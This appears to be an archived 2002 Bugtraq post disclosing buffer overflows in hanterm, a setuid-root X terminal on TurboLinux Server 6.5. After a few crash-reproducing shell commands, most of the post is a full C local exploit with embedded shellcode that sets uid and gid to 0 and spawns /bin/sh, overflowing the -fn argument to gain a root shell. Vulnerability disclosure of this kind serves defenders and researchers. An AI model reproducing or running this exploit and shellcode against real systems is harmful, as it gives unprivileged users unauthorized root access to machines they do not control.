Bugtraq mailing list archives
Overflow Vulnerabilities in hanterm
From: xperc <xperc () hotmail com>
Date: 7 Feb 2002 10:33:27 -0000
Hi,I'm xperc.
hanterm is Hangul terminal for X. it is based on the
xterm in XFree86. The hanterm binary is default
installed with setuid root permissions for TurboLinux
Server 6.5. but contains insecure code with allows
unprivileged local users to obtain root access on the
local system.
$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x 1 root root 166100 03 13
2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc
/* hanterm_exp.c
*
* local exploit for hanterm
* .. tested in TurboLinux Server 6.5 (Japan)
*
* thanks my Japanese friend kaju(kaijyu)
* and Japanese hacker UNYUN.
*
* by xperc () hotmail com
* 2002/02/07
*/
#include <stdio.h>
#define NOP 0x90
#define MAXBUF 88
#define RETOFS 84
#define SHELL_OFS 22
#define ESP_OFS -0xe38
unsigned int get_esp()
{
__asm__("mov %esp,%eax");
}
int main()
{
static char shellcode[]={
0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
};
unsigned int retadr;
char buf[MAXBUF];
int i;
memset(buf,NOP,MAXBUF);
retadr=get_esp()+ESP_OFS;
printf("Jumping address = %p\n",retadr);
for(i=RETOFS-32;i<RETOFS+32;i+=4){
buf[i] =retadr&0xff;
buf[i+1]=(retadr>>8)&0xff;
buf[i+2]=(retadr>>16)&0xff;
buf[i+3]=(retadr>>24)&0xff;
}
strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
//buf[MAXBUF-1]='\0'; faint!:-(
execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}
Current thread:
- Overflow Vulnerabilities in hanterm xperc (Feb 07)